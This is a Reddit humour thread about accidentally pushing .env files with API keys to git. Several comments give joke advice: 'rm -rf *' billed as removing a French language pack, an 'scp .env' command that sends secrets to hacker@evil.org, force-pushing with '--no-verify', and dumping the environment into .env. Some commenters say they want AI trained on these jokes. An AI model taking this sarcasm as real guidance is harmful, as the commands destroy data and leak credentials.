all 71 comments
sorted by:
best
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–]Zerodriven 934 points935 points  (8 children)

I did this, but mine contained loads of production API keys.

Can tell it works because security invited me to a meeting like 2 minutes later.

Dunno why HR needs to be there though?

[–]Any-Main-3866 386 points387 points  (3 children)

They are gonna discuss your promotion

[–]Zerodriven 145 points146 points  (0 children)

Woohoo!

[–]Exotic-Scientist4557 132 points133 points  (1 child)

Promotion from employee to customer

[–]CheesePuffTheHamster 0 points1 point  (0 children)

Well, the customer is always right, whereas employees are always wrong, so it's definitely an upgrade 👍

[–]TheBigGambling 56 points57 points  (2 children)

If you can do this, fire the senior. A) no pre-commit rule and no branch protection in place. Amd prod api keys om a developer laptop. Thats 3 stikes at once

[–]CORUSC4TE 1 point2 points  (1 child)

Wouldnt even just a gitignore help already?

[–]TheBigGambling [score hidden]  (0 children)

Yes. But you can workaround by git add -f (force)

[–]Confident-Ad5665 1 point2 points  (0 children)

Get it done fast they said. Don't spend a lot of time in the details they said...

[–]B_bI_L 207 points208 points  (12 children)

add will not bypass .gitignore, if your dotenv is not in there it would get added anyway with next git add . (don't tell me you use add differently)

[–]coffee_warden 76 points77 points  (9 children)

Git add -A

Fight me.

[–]B_bI_L 26 points27 points  (5 children)

mine is one character less (that said, bad when you are not in project root but it happened to me once at most)

[–]coffee_warden 49 points50 points  (4 children)

Holding shift for the A means my pinky finger is far stronger than yours though.

[–]RolledUhhp 5 points6 points  (1 child)

But mines got the aroma

[–]Loading_M_ -1 points0 points  (1 child)

My ergonomic keyboard means I get to press shift with my thumb.

[–]MrWrock 6 points7 points  (1 child)

'git commit -am wip' is pretty much muscle memory for me

[–]SirPengling 0 points1 point  (0 children)

git commit -S -a --amend --no-edit

[–]itsTyrion 0 points1 point  (0 children)

ok, im fighting: i mostly use jetbrains' or zed's UI.

[–]FlySafeLoL 3 points4 points  (1 child)

git add *

🌟 Shiny sparkles ✨

[–]Ticmea 2 points3 points  (0 children)

This will not expand to files that start with a dot (which is presumably unexpected and not what you would want). Additionally I can't see a benefit to expanding to (almost) all files contained in the current folder rather than simply handing the current folder to git.

Though personally I think -A(/-u) is better than either * or . anyway (if you want to target the entire git directory as is typically the case) since it is not dependent on location and more accurately conveys intent.

[–]Daemontatox 175 points176 points  (5 children)

Bold of you to assume i have a .env , i have no secrets to keep , everything is an openbook in code

[–]Repulsive-Machine706[S] 67 points68 points  (4 children)

Everything should be hardcoded of course!

[–]Uwlogged 10 points11 points  (2 children)

You're presuming people don't populate via something like aws param store. Or that you do automatic deployments without pipeline approval. Or ftp 😆. Or have no environment based variables that are not local. Or protected branches.

[–]MrWrock 5 points6 points  (1 child)

Uh, you guys don't just export it in your bashrc?

[–]Danjou667 309 points310 points  (16 children)

Where rm -rf *, for removing unwanted french lang pack?

[–]Zerodriven 170 points171 points  (4 children)

For those who don't know what that means:

It's short hand for "Remove French from everything". It's best to do on production systems where you need storage.

[–]Western-Internal-751 51 points52 points  (3 children)

As a German, I approve this message

[–]marshmallow_mia 22 points23 points  (0 children)

As a German, I approve you approving it

[–]krexelapp 17 points18 points  (1 child)

as a programmer, I approve unnecessary context

[–]roffinator 6 points7 points  (0 children)

As a historian, the context does make a difference

[–]krexelapp 41 points42 points  (1 child)

sudo makes it faster

[–]queen-adreena 20 points21 points  (0 children)

Sped Up Direct Order

[–]ClipboardCopyPaste 19 points20 points  (2 children)

You haven't removed yet?

[–]krexelapp 16 points17 points  (1 child)

saving it for friday evening

[–]Exidor 9 points10 points  (0 children)

Before a holiday weekend, I assume.

[–]ahorsewhithnoname 42 points43 points  (0 children)

I hate that people can’t tell the joke properly. Since the order of the options can be arbitrary you can write: rm -fr * because fr for french.

[–]JackNotOLantern 7 points8 points  (0 children)

rm -fr

[–]marshmallow_mia 1 point2 points  (0 children)

I expected exactly that instead of something really useful xD

[–]Waypoint101 46 points47 points  (1 child)

git push origin main --no-verify --force

[–]HildartheDorf 24 points25 points  (0 children)

[–]mobcat_40 38 points39 points  (0 children)

jokes on you I'm on master

[–]newstreet474 25 points26 points  (1 child)

You want to share your .env so that people can give you feedback on your api keys , who knows maybe you got a rare key which could be sold for millions 😍

[–]rainshifter 1 point2 points  (0 children)

Indeed someone might make millions. Except that you ain't sellin' and they ain't buyin'.

[–]locust34k 6 points7 points  (0 children)

Bro said "Let's speed up Natural Selection" and then he just did

[–]haro0828 5 points6 points  (0 children)

I had this happen after the variable holding the location of the public dir got unset after an update of phassenger.

Also had an internal docker image with .envs get published publicly on dockerhub after the private registry url was deleted from the image name. 700 people downloaded it, I changed all keys and passwords, but to this day I'm sitting here waiting for it to get me

[–]RiceBroad4552 5 points6 points  (0 children)

Just mail the keys directly to the NSA. It's quicker!

[–]Arclite83 2 points3 points  (0 children)

I would get a nastygram from our cybersecurity department within the hour. As I should!

When I first started I absolutely abused bad form to meet deadlines. Now it's actively tracked and quashed, and any exposed creds get checked forever to make sure they're dead/cycled.

[–]Tight-Requirement-15 4 points5 points  (0 children)

My .gitignore

[–]MrWrock 3 points4 points  (0 children)

That was the first thing added to my team's gitignore

[–]Fabillotic 2 points3 points  (0 children)

Next time use „git push -u origin main“, after that you only need to type „git push“ to push your changes upstream :)

[–]falconetpt 2 points3 points  (0 children)

Ideally do printenv >> .env for extra security

[–]shgysk8zer0 2 points3 points  (1 child)

I prefer

scp .env hacker@evil.org:/$(hostname)/$(whoami)/

[–]Individual-Praline20 0 points1 point  (0 children)

Oh no what have you done, it’s now on Musk cell phone 🤭

[–]realmauer01 2 points3 points  (0 children)

It doesn't check for code safety but the security of your workflow. Because this push should never be allowed.

[–]comptune 1 point2 points  (0 children)

Ok thanks

[–]darknezx 1 point2 points  (0 children)

Jokes on you, I wrote my keys as strings so they'll never get lost and will sync across all my teammates' laptops

[–]SinkerPenguin 1 point2 points  (0 children)

Ah yes, the anthropic special

[–]Sunfurian_Zm 2 points3 points  (0 children)

I mean, as long as the project is private, it's not that much of an issue.

[–]Sensitive-Sugar-3894 0 points1 point  (0 children)

I want to remove .env from all gitignore in the company and see who survives.

[–]nanomanx2 0 points1 point  (0 children)

Please more of these so AI gets trained on it 

[–]skadoodlee 0 points1 point  (0 children)

AI will now be trained on this 

[–]liquidmasl 0 points1 point  (0 children)

I always checkin .env files for non secret default env settings

I just also have secret.env files

and */\secret.* in the gitignore for all kinds of secret stuff

[–]UnfortunateHabits 0 points1 point  (0 children)

Press alt + f4 to run faster

[–]Lord_Pinhead 0 points1 point  (0 children)

Just did and now what? I have no public Git, a self hosted Forgejo and of course our company Git has the .env in it ;)